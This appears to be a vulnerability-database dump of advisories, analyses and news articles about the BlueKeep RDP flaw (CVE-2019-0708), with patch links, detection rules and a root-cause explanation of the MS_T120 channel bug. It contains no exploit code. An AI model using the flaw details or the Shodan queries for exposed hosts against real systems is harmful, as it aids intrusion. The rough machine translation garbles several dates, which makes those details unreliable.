vulnerability in Remote Desktop Services.\");\n\n script_tag(name:\"insight\", value:\"Microsoft released a security advisory to disclose a remote code execution vulnerability in Remote Desktop Services. An unauthenticated attacker connects to the target system using RDP and sends specially crafted requests to exploit the vulnerability. Successful exploit may cause arbitrary code execution on the target system. 
(Vulnerability ID: HWPSIRT-2019-05133)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2019-0708.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system.\");\n\n script_tag(name:\"affected\", value:\"OceanStor HVS85T versions V100R001C00\n\nOceanStor HVS88T versions V100R001C00\n\nSMC2.0 versions V500R002C00 V600R006C00\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190529-01-windows-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-05-15T15:21:00", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "2019 5 on 14 September, Microsoft is the emergency release for the Remote Desktop service Remote Desktop Service, RDP, previously known as Terminal Services remote code execution vulnerability CVE-2019-0708 fix, the vulnerability affects some older versions of Windows system such as Windows XP, Windows Server 2003, Windows 7, Windows Server 2008, etc. \nTheoretically, the Remote Desktop Services does not in itself vulnerable to attack, but once attacked, the consequences however could be disastrous. If you still don't know the vulnerability of power, please think about 2017 5 on the outbreak of the WannaCry, also called Wanna Decryptor to. 
\nCVE-2019-0708 vulnerability simply by pre-authentication, pre-authentication and no user interaction will be able to achieve the attack, which means that it and WannaCry the same, all belong to a\u201cworm\u201dattack. This vulnerability can be through the network worms of the way be utilized, the use of this vulnerability with any malicious software are possible from the infected computer to spread to other vulnerable computers, in a manner and 2017 WannaCry malware spread in a similar way. \nAlthough the Microsoft Security Response Center MSRC temporarily did not find favor with this vulnerability the malicious samples, but still want to be fully prepared. A recent study found that a malicious attacker is likely for this vulnerability to write an exploit program, and embedding it into their own malware. \nThe scope of the impact \n\u00b7 Windows 7; \n\u00b7 Windows Server 2008 R2; \n\u00b7 Windows Server 2008; \n\u00b7 Windows 2003\uff1b \n\u00b7 Windows XP; the \nPlease note: Windows 8 and Windows 10 and later version users are not affected by this vulnerability. \nRepair way \nCan be in Microsoft Security Update Guide found in the support Windows version download, using a supported version of Windows and enable the automatic update client will automatically be protected. \nUnsupported systems including Windows 2003 and Windows XP, if you use an unsupported version, the solution to this vulnerability is the best way to upgrade to the latest version of Windows. Even so, Microsoft is still in the KB4500705 for these unsupported versions of Windows to provide a fix. \nIn the enable network level authentication NLA of affected system may be part of the mitigation could exploit this vulnerability\u201csuspicious\u201dmalware or advanced malicious software threat, because the NLA in the trigger the vulnerability before the need for authentication. 
However, if the attacker has can be used to successfully authenticate with valid credentials, the affected system is still vulnerable to remote execution code execution RCE of the attack. \nFor these reasons, Microsoft strongly recommends that all affected systems, whether NLA is enabled, it should be updated soon. \nPossible attack power \nSuccessful exploitation of this vulnerability an attacker can be on the target system, execute arbitrary code, then an attacker can install a malicious program, and then view, change, or delete the target data on the device, and even create a full user permissions to the new account. \nTo exploit this vulnerability method \nTo exploit this vulnerability, an attacker would need to via RDP to the target system the Remote Desktop service to send a send a specially design request. \nReference and source: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nhttps://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/?from=groupmessage&isappinstalled=0 \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994153", "href": "http://www.myhack58.com/Article/html/3/62/2019/94153.htm", "title": "Microsoft emergency release CVE-2019-0708 vulnerability fixes-bug warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-15T15:21:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "1, Overview \n2019 5 May 14, Microsoft officially released the Remote Desktop Services Remote Desktop Services critical remote code execution vulnerability CVE-2019-0708 security patches affected Windows system version in with Remote Desktop enabled when the service is vulnerable to remote code execution attacks. 
The vulnerability does not require user interaction, i.e., the vulnerability can be exploited to initiate a worm type of attack, similar WannaCry\uff08Morgul\uff09ransomware worm event. Although currently not found the exploits, but after the attacker is likely to be the exploit was added to the malicious code, just like MS17-010\uff08Eternal Blue vulnerabilities, Microsoft is in 2017 3 \u6708 14 release MS17-010 vulnerability patches, 2017 5 May 12, WannaCry\uff08Morgul use of the Eternal Blue vulnerability to spread. \nAccording to the relevant data source statistics, at present, the global public network with nearly 300 multi-million computer to open the 3389 port, i.e. not to change the port of Remote Desktop Services, RDP, for not through the configuration of the reinforcing within the network of more large number of machines open the relevant port services. Therefore, the vulnerability may cause the Internet to a large area of worm propagation, botnet a large area of infection, also be formed within the network of a large area lateral of the mobile attack capability. \n2, the vulnerability described in \nVulnerability ID: CVE-2019-0708 \nThe vulnerability allows an unauthenticated attacker to use Remote Desktop Services to connect to the target system and send well-designed request, use its identity pre-authentication, no user interaction is required to confirm consent to receive a connection defect can be on the target system, execute arbitrary code, covering but not limited to setup, view, change, or delete the target data within the system, or created with the full user permissions to the new account. \nExploitation of this vulnerability need to meet the following conditions: \n1\\. In Windows operating system to enable the Remote Desktop Services Remote Desktop Services, and the failure to promptly install the update patch; and \n2. The attacker through RDP to the target system the Remote Desktop service to send a well-designed request. 
\n3, the affected range \nThe affected Windows operating system version: \nWindows XP SP3 x86 \nWindows XP Professional x64 edition SP2 \nWindows XP Embedded SP3 x86 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2003 SP2 x86 \nWindows Server 2003 x64 edition SP2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Embedded POSReady 2009 \nWindows Embedded Standard 2009 \n4, repair and mitigation recommendations \n1, as soon as possible to install the vulnerability patch, even if has been disabled Remote Desktop Services[1]. Fig. \n2, if you do not need to use the Remote Desktop service, it is recommended to disable the service. \n3, in an affected version of system enabled on network level authentication, NLA; to enable NLA, the attacker needs to use on the target system to a valid account on the Remote Desktop Services authentication, to successfully exploit the vulnerability. \n4, in the enterprise perimeter or border firewall to deploy the security policy that blocks TCP port 3389. \n5, Security days smart the methyl terminal defense system with an aptitude for production safety operation and maintenance system used in combination, can substantially reduce the exposed surface, forming a threat to defense response of the base frame. 
\nAppendix A: references \n[1] CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability \nhttps://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 \nhttps://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EA \nhttps://support.microsoft.com/en-us/help/4500331/windows-update-kb4500331 \n[2] Acknowledgements: the Remote Desktop Services Remote Code Execution Vulnerability(he UK's National Cyber Security Centre (NCSC)) \nhttps://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994154", "href": "http://www.myhack58.com/Article/html/3/62/2019/94154.htm", "title": "Windows remote code execution vulnerability(CVE-2019-0708)early warning-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-09-07T10:43:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "9 \u6708 7 Morning, open your eyes, the continuous rain of Shanghai has finally cleared up, the circle of friends was the\u201cstorm\u201d--the one known as wannacry level of vulnerability BlueKeep\uff08CVE-2019-0708\uff09exploit released. \n! [](/Article/UploadPic/2019-9/20199714522870. png) \nMetasploit on the blog and Twitter, in succession to publish news that Metasploit formal integration for CVE-2019-0708, also known as the BlueKeep the Exploit module, although at present the initial version applies only to the 64-bit version of Windows 7 and Windows 2008 R2, but also the release of a threat signal, no potential attacker has already begun to pay attention to this information, along with the subsequent module updates, BlueKeep the vulnerability of the power is also gradually revealed. \n! [](/Article/UploadPic/2019-9/20199714522398. 
png) \nCurrently have noticed a lot of security personnel or the laboratory has conducted a vulnerability reproduced, further confirmed the EXP availability. Note that the EXP is easy to cause the system to blue screen caused by a system interruption in service. Recommendations of the red team, etc. before the test, the evaluation system degree of importance, caution. \nOn BlueKeep\uff08CVE-2019-0708\uff09 \nGMT 5 December 15, Microsoft released for Remote Desktop Services remote code execution vulnerability CVE-2019-0708 fixes, the vulnerability is triggered without user interaction. This also means that an attacker can use the vulnerability to make similar to 2017 swept the world of WannaCry class of worm virus, large-scale spread and destruction. \nRemote Desktop Services formerly known as Terminal Services in remote code execution vulnerability exists when an unauthenticated attackers use RDP to connect to the target system and send a specially crafted request. Successful exploitation of this vulnerability an attacker can be on the target system execute arbitrary code. The attacker could then install programs; view, change, or delete data; or create full user permissions to the new account. To exploit this vulnerability, an attacker would only need to via RDP to the target system the Remote Desktop service send a malicious request. 
\nTimeline of this vulnerability: \n1. May 14, 2019: Microsoft released the security advisory and the corresponding patch for the Remote Desktop Services remote code execution vulnerability CVE-2019-0708, with a dedicated write-up pointing out that this serious vulnerability could be used to spread a worm. \n2. May 15, 2019: Douxiang's intelligent security platform published early-warning information and a handling plan, and shortly afterwards put a vulnerability detection tool online for ARS/PRS. \n3. May 23, 2019: A PoC program with a non-destructive vulnerability scanning function appeared on open internet channels. \n4. May 25, 2019: Hackers began large-scale scanning for vulnerable devices. \n5. May 30, 2019: Microsoft issued a second patch alert for CVE-2019-0708, strongly recommending, given the severity of the vulnerability, that users upgrade as soon as possible. \n6. May 31, 2019: PoC code that triggers a blue screen appeared in open sources; Douxiang's security emergency response team confirmed that the PoC code works. \n7. June 8, 2019: The commercial version of Metasploit began offering an exploit module capable of remote code execution. \n8. July 31, 2019: The commercial exploit kit Canvas added a CVE-2019-0708 exploit module. \n9. September 7, 2019: The Metasploit CVE-2019-0708 exploit module was released through open channels, making the worm threat real. \nImpact of the vulnerability \nAn attacker who successfully exploits this vulnerability can execute arbitrary code on the target system, and could then install programs; view, change, or delete data; or create new accounts with full user rights. 
\nAffected scope \nProduct \nWindows operating systems \nVersion \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows Server 2003 (out of support) \nWindows XP (out of support) \nComponent \nRemote Desktop Services \nSolution \nOfficial patch \nUpdate through the Automatic Updates feature of the Windows operating system, or download the patch for your system version from the list at the end of this article and run the installer. \nTemporary mitigations \n1. Disable Remote Desktop Services \n2. Block the Remote Desktop Services port (3389) at the firewall \n3. Enable Network Level Authentication on Windows 7, Windows Server 2008 and Windows Server 2008 R2 \nReferences \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nhttps://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0 \nOfficial patch downloads \nOperating system version, followed by the patch download link \nWindows 7 x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu \nWindows 7 x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu \nWindows Embedded Standard 7 for x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu \nWindows Embedded Standard 7 for x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu \nWindows Server 2008 x64 
\nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu \nWindows Server 2008 Itanium \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu \nWindows Server 2008 x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu \nWindows Server 2008 R2 Itanium \n\n\n", "edition": 1, "modified": "2019-09-07T00:00:00", "published": "2019-09-07T00:00:00", "id": "MYHACK58:62201995881", "href": "http://www.myhack58.com/Article/html/3/62/2019/95881.htm", "title": "Worms level vulnerability BlueKeep(CVE-2019-0708) EXP is released-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-15T15:21:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "On May 14, 2019, Microsoft released security patches fixing a remote code execution vulnerability in the Windows Remote Desktop service that affects some older Windows versions. The vulnerability is pre-authentication and requires no user interaction, which means it can be exploited by a network worm: any malware using it could spread from an infected computer to other vulnerable computers in much the same way as the 2017 WannaCry malware. \nAfter assessment, 360-CERT has confirmed the severity of the vulnerability and recommends that users apply the patch immediately. \n\n0x01 Affected scope \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows 2003 \nWindows XP \nUsers of Windows 8, Windows 10 and later versions are not affected by this vulnerability. 
\n\n0x02 Remediation recommendations \nRun a one-click update through 360 Security Guard (http://weishi.360.cn/) \nWindows 7 and Windows Server 2008 users should promptly install the Windows security updates that have been released \nWindows 2003 and Windows XP users should upgrade their system version \nInterim mitigation: \nEnable Network Level Authentication (NLA) \n\n0x03 Timeline \n2019-05-14 Microsoft official security bulletin \n2019-05-15 360CERT warning \n\n0x04 Reference links \nhttps://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/ \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994152", "href": "http://www.myhack58.com/Article/html/3/62/2019/94152.htm", "title": "CVE-2019-0708: Windows RDP service worms level vulnerability alerts-a vulnerability alert-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-15T15:21:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "On the second anniversary of WannaCry, Windows is again exposed to a high-risk remote vulnerability. On May 15, Microsoft released its May security updates, fixing 82 vulnerabilities in total, among them CVE-2019-0708, a remote code execution vulnerability in the Remote Desktop (RDP) service. \n![](/Article/UploadPic/2019-5/201951519518699.jpg) \nAccording to a blog post published by the Microsoft Security Response Center (MSRC), the Remote Desktop Protocol (RDP) itself is not susceptible to attack; the vulnerability is pre-authentication and requires no user interaction. 
This means that any future malware exploiting this vulnerability could spread from vulnerable computers to other computers in a manner similar to the 2017 WannaCry malware around the world. \nBy exploiting the vulnerability, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. The temptation this vulnerability presents is easy to imagine: once a PoC is released, WannaCry could repeat itself before most people have had time to update. \nSo far, however, no malicious activity exploiting the vulnerability has been found, and many of the supposed exploits that have appeared on GitHub are star-farming, phishing or pranks. \n![](/Article/UploadPic/2019-5/201951519518174.png) \nYou think it is an exploit...... \n![](/Article/UploadPic/2019-5/201951519518566.png) \nIt just wanted to tell you: Never Gonna Give You Up. \nScope of CVE-2019-0708: \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows Server 2003 (out of support) \nWindows XP (out of support) \nApart from Win8 and Win10, almost all Windows versions are affected by this vulnerability. Although Microsoft has ended support for Windows 2003 and Windows XP, the severity of this vulnerability led Microsoft to release fixes covering all affected Windows versions. \nSecurity recommendations \n1. Temporary mitigation \nEnable Network Level Authentication (NLA) on affected systems. With NLA enabled, an attacker must first authenticate to Remote Desktop Services with a valid account on the target system before the vulnerability can be exploited. \nMicrosoft officially recommends updating as soon as possible regardless of whether NLA is enabled, to eliminate the vulnerability completely. \n2. 
Security patches \nSince Win8 and Win10 are not affected by CVE-2019-0708, those users can rest assured. Win7 and Server 2008 users can install the patch directly through automatic system updates; if automatic updates have been turned off, the patch for the corresponding version can be downloaded from the following link: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nWindows 2003 and Windows XP users cannot install the patch through automatic updates, since official support has ended, and must download and install the security patch manually from the following address; 360 Security Guard users can install the patch through the shortcut in the “vulnerability repair” function: \nhttps://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 \n\n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994162", "href": "http://www.myhack58.com/Article/html/3/62/2019/94162.htm", "title": "Windows re-aeration\u201cWannaCry\u201dlevel vulnerability CVE-2019-0708, cures XP, Win7-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-22T17:19:40", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "![](/Article/UploadPic/2019-5/201952221409502.png) \n\nPreface \nIn its May security update bulletin this year, Microsoft mentioned a vulnerability in the Remote Desktop Protocol (RDP). The reason we analyse this vulnerability specifically is that the update covers Windows XP alongside other Windows operating systems, and as everyone knows, Windows XP has gone many years without any update. So why has Microsoft fixed this high-risk vulnerability now? 
Don't worry, let's take a look! \nAccording to the security bulletin Microsoft released, this is a very serious security vulnerability that lets an attacker achieve remote code execution on the target device and implant worms and other malware. This also means that once a target organization is infected, the other unprotected computers across its entire network will not be “spared” either. In this security bulletin, Microsoft mentioned the famous internet worm “WannaCry”. In March 2017 Microsoft fixed MS17-010, the vulnerability related to that malware, but before that many attackers were already using “WannaCry” for network attacks. \nGiven the high-risk threat level of this vulnerability, attackers are likely to develop exploit tools for it during this period. The McAfee Advanced Threat Research team has therefore carried out an in-depth analysis of the vulnerability and its associated threat scenarios, and we recommend that users patch CVE-2019-0708 as soon as possible. \n\nAffected OS \nWindows 2003, Windows XP, Windows 7, Windows Server 2008, Windows Server 2008 R2 \n\nThe RDP protocol \nThe Remote Desktop Protocol (RDP) is a multi-channel protocol that lets a user, client or “local computer” establish a communication connection with a Microsoft Terminal Services computer, the server or “remote computer”. Most Windows systems on the market today ship with the Remote Desktop Protocol. Client software also exists for other operating systems, such as Linux, FreeBSD and Mac OS X. 
The protocol is an extension of T.120, the international standard multi-channel conferencing protocol published by the International Telecommunication Union. Since Terminal Services was launched there have been four versions of RDP: 4.0, 5.0, 5.1 and 5.2; in general, the version is determined by the Windows version. From the client's point of view, the 5.x versions do not differ greatly in functionality; relative to 4.0 they provide direct login with a user name and password, client drive resource mapping, client audio playback, color display up to 24 bits, and FIPS-compliant encryption of the connection. In addition, from 4.0 onwards the protocol offers high, medium and low data encryption levels, a client-customized initial login environment, client printer mapping, client LPT port mapping, client COM port mapping, clipboard mapping, and personalized client login settings (keyboard, screen size, etc.). Version 7.0 is the latest version and is only supported on Windows Server 2008 R2, Windows 7 and above. \n\nVulnerability overview \nA worm is a virus that can self-replicate and spread among systems within a network, running automatically on the remote host it infects without any additional user interaction. If a piece of malware's main attack vector is the network, it should be classified as a worm. \nThe Remote Desktop Protocol (RDP) defines a mode of data communication between the two sides over virtual channels, supporting point-to-point connections established by the client. These virtual channels are bidirectional data channels that extend the functionality of RDP. RDP v5.
1 in Windows Server 2000 defines 32 static virtual channels (SVCs), but because a large number of dynamic virtual channels (DVCs) are also involved, the available number and types of channels are subject to certain limits. SVCs are created at the start of a session and remain unchanged until the session terminates; DVCs are different, because they are created and deleted according to the user's needs. \n\nVulnerability analysis \nCVE-2019-0708 lies in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions of the RDP driver termdd.sys. The following figure shows the sequence in which the system initializes an RDP connection: the channel is established before the security mechanisms are enabled, and this is what leads to the vulnerability. It is also why CVE-2019-0708 is wormable: it can self-replicate and propagate to systems within the target network that have port 3389 open. \n![](/Article/UploadPic/2019-5/201952221409676.png) \nFirst, a brief introduction to the static virtual channel “MS_T120”, whose RDP channel number is 31 in the GCC session initiation sequence. This is a channel name used internally by Microsoft; when a client requests a connection over an SVC, no information about the “MS_T120” channel is shown. \nThe following figure shows the channel request information in the GCC session initialization sequence; we can see that it contains nothing about the MS_T120 channel. \n![](/Article/UploadPic/2019-5/201952221409844.png) \nBut because the channel names the client provides during GCC session initialization are not checked against a whitelist on the server side, an attacker can set up another SVC named “MS_T120” in place of the legitimate channel numbered 31, corrupting the target system's heap memory or achieving remote code execution. 
\nThe following figure shows an abnormal channel request during the GCC session initialization process: an “MS_T120” channel with channel number 4: \n![](/Article/UploadPic/2019-5/2019522214010337.png) \nThe components involved in managing the MS_T120 channel are labeled in the figure below. The MS_T120 channel reference is created in rdpwsx.dll, and its heap memory is allocated from the memory pool in rdpwp.sys. When the MS_T120 channel reference is established with a channel number other than 31, heap memory corruption occurs. \n![](/Article/UploadPic/2019-5/2019522214010223.png) \nThe following figure shows Microsoft's fix: in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions of termdd.sys, Microsoft added code that checks the channel name in the client connection request for “MS_T120” and ensures that this channel is bound to channel number 31. \n\n\n", "edition": 1, "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "MYHACK58:62201994234", "href": "http://www.myhack58.com/Article/html/3/62/2019/94234.htm", "title": "Together we analyze this just to fix the RDP vulnerability, CVE-2019-0708-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-24T21:28:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Recently, with the publication of CVE-2019-0708, most of the security community has treated this vulnerability as the highest priority to address. When it comes to fixing vulnerabilities, it is hard not to recall the disastrous consequences of WannaCry and NotPetya. 
And from past experience we know very well that users often do not fix a vulnerability immediately; it takes a relatively long time. For this high-risk vulnerability, therefore, we need to develop detection rules quickly. \nThere is one small but very important detail about CVE-2019-0708: the vulnerability concerns Remote Desktop Services, Microsoft's implementation of the Remote Desktop Protocol (RDP) on Windows. The RDP protocol itself is not the problem. I mention this to avoid a repeat of the hype we saw during the WannaCry outbreak. \nThe “BlueKeep” label was first used by Kevin Beaumont. I chose this label for two reasons: to have a reference, and to be able to find related posts on Twitter; we cannot simply use the CVE as a tag unless we remove the dash. The BlueKeep tag just makes tweeting easier. \n![](/Article/UploadPic/2019-5/201952513833498.png) \nVulnerability impact analysis \nTo build a detection theory, we must consider two threat models: \n1\\. A worm threat, similar to the WannaCry scenario. \n2\\. An APT attacker using the vulnerability as one part of a more complex attack, just as EternalBlue and the SMB protocol were only one part of the catastrophic NotPetya attack. \nTo identify assets at risk, we refer to the following table provided by Dragon: \n![](/Article/UploadPic/2019-5/201952513833958.png) \nCould CVE-2019-0708 be used for large-scale initial access like WannaCry? A quick look at Shodan data shows a large number of hosts on the network exposing port 3389 that may be running vulnerable versions of Windows. 
\n\nThe search URLs are as follows: \n\u00b7 https://www.shodan.io/search?query=port%3A3389+os%3A%22Windows+7+or+8%22 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+2003 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+2008 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+os%3A%22Windows+XP%22 \nOverall, we can find about 2.385 million hosts on the internet exposing RDP, but it is not possible to verify the accuracy of this figure. \n![](/Article/UploadPic/2019-5/201952513839135.png) \nThe search URL is: https://www.shodan.io/search?query=Remote+Desktop+Protocol \nQuoting Dan Tentler's tweet of April 23, 2017, “not all hosts are Windows, and not all of these ports are SMB”. We can adapt that sentence for today: “not all of these 2.3 million hosts are Windows, and not all of these ports are services vulnerable to CVE-2019-0708”. If we compare the CVE-2019-0708 timeline with WannaCry's, we are now at the stage where MS17-010 has been released but EternalBlue has not yet appeared, so we cannot yet scan for the next DoublePulsar. Until such a PoC exists, we cannot fully determine how things will develop. However, even if the threat reaches the WannaCry stage, we may still have 30 days to put defenses in place, although that time could of course be shorter. \n![](/Article/UploadPic/2019-5/201952513840966.png) \nAlthough we can debate whether the hosts in these audits can really be exploited by an attacker, and analyze their patch status, network segments and so on, it is known that many companies are still running vulnerable versions of Windows, and the patch cycle for these systems may be harder. From the WannaCry data, we see that there were about 2.
4 million potentially exploitable hosts and more than 14 million suspected affected hosts, and DoublePulsar was posted to the internet 3 weeks before the event. \nAt this stage, the greater risk is the use of CVE-2019-0708 within an organization to rapidly compromise hosts and move laterally. And since no exploit PoC had appeared online at the time of writing (there are many fakes), we will use every tool at our disposal to build detection before the exploit appears. \nConsidering the above, as defenders we can do three things: \n1\\. Deploy active detection; \n2\\. Strictly require patching of the vulnerability or mitigation of its risk; \n3\\. Take the opinions of trusted researchers into account and track how the risk develops. \nTo explain this concretely, I quote Florian Roth's tweet here: \n![](/Article/UploadPic/2019-5/201952513840151.png) \nSpotting the fire: Sigma rules \nThe first rule, which we refer to as Sigma #1, was contributed to the Sigma GitHub repo by Markus Neis; it covers the lateral movement technique T1210/Exploitation of Remote Services (https://attack.mitre.org/techniques/T1210/): \n![](/Article/UploadPic/2019-5/201952513841296.png) \nWithin an hour, a similar rule, Sigma #2, was released by Roman Ranskyi on SOC Prime TDM and made available to the community for free; its detection logic extends to T1036/Masquerading (https://attack.mitre.org/techniques/T1036/) and T1046/Network Service Scanning (https://attack.mitre.org/techniques/T1046/). \nBasically, we now have TLP:WHITE and TLP:GREEN coverage, and we catch the activity before the vulnerability is exploited. But is this enough to fully discover attacker behavior? \nGoing further: machine learning \nNext, we explore how machine learning can give us some advantages in detection, and consider how to build the solution with the Elastic stack. 
\nTheory: \nWithin a defined time window, a host that initiates a large number of RDP connections to too many distinct target IP addresses is a sign of suspected worm-like lateral movement and propagation over RDP, which may be exploiting the RDS vulnerability CVE-2019-0708. \n\n\n", "edition": 1, "modified": "2019-05-25T00:00:00", "published": "2019-05-25T00:00:00", "id": "MYHACK58:62201994259", "href": "http://www.myhack58.com/Article/html/3/62/2019/94259.htm", "title": "CVE-2019-0708 vulnerability impact analysis and the use of a variety of rules to detect method-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-26T11:45:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "On May 15, 2019, Microsoft released its May patch update list, which included a remote code execution vulnerability in RDP Remote Desktop Services rated critical: an attacker can exploit it remotely, without user authentication, by sending specially crafted malicious data, execute malicious code on the target system and thereby gain full control of the machine. \nFrom patch analysis to vulnerability analysis, then to the PoC release, then to the release of an exploit video, 2 months and 10 days have passed. \nThis series has now reached its fourth round. \nFirst: the Remote Desktop Services remote code execution vulnerability PoC is published \nSecond: Remote Desktop Services vulnerability analysis and detection code are disclosed; the dark web has begun selling what may be an exploit \nThird: Microsoft issues a second notice reminding users to update their systems to prevent a worm \nBecause not much time is left for users to patch.
\nSince last week's Kanxue conference, the slides from the Tencent Keen Lab experts have appeared on the net. \n![](/Article/UploadPic/2019-7/201972616547738.png) \n![](/Article/UploadPic/2019-7/201972616547946.jpg) \nDownload: \nhttps://github.com/blackorbird/APT_REPORT/blob/master/exploit_report/%23bluekeep%20RDP%20from%20patch%20to%20remote%20code%20execution.pdf \nForeign security researchers have suddenly started a wave of openly disclosing how the exploit is constructed \n![](/Article/UploadPic/2019-7/201972616548254.png) \n![](/Article/UploadPic/2019-7/201972616548834.jpg) \nMeanwhile the U.S. company Immunity, which specializes in selling a commercial penetration testing kit, finally could not hold back and made its big move: openly hawking it on Twitter. \n![](/Article/UploadPic/2019-7/201972616548106.png) \nCanvas is the commercial exploitation tool from Dave Aitel's company ImmunitySec. It includes more than 370 exploits, all with complete code, as well as some 0-day vulnerabilities. \n(PS: it is actually cheaper than the commercial version of Metasploit.) \nThe demo video is below. \nhttps://vimeo.com/349688256/aecbf5cac5 \nIt has clearly been weaponized. \nThe Immunity CANVAS BlueKeep module achieves remote code execution, i.e. it opens a shell on the infected host and executes commands. \n![](/Article/UploadPic/2019-7/201972616548793.jpg) \nAlthough a CANVAS license costs anywhere from thousands to tens of thousands of dollars, hackers already know how to pirate legally purchased penetration testing tools such as Cobalt Strike. \nThis means hackers around the world may already be eyeing CANVAS, waiting for a wealthy buyer to purchase it so that the new version leaks and a cracked copy reaches everyone. \nHowever, I still have no money; those who do can start the show. \n!
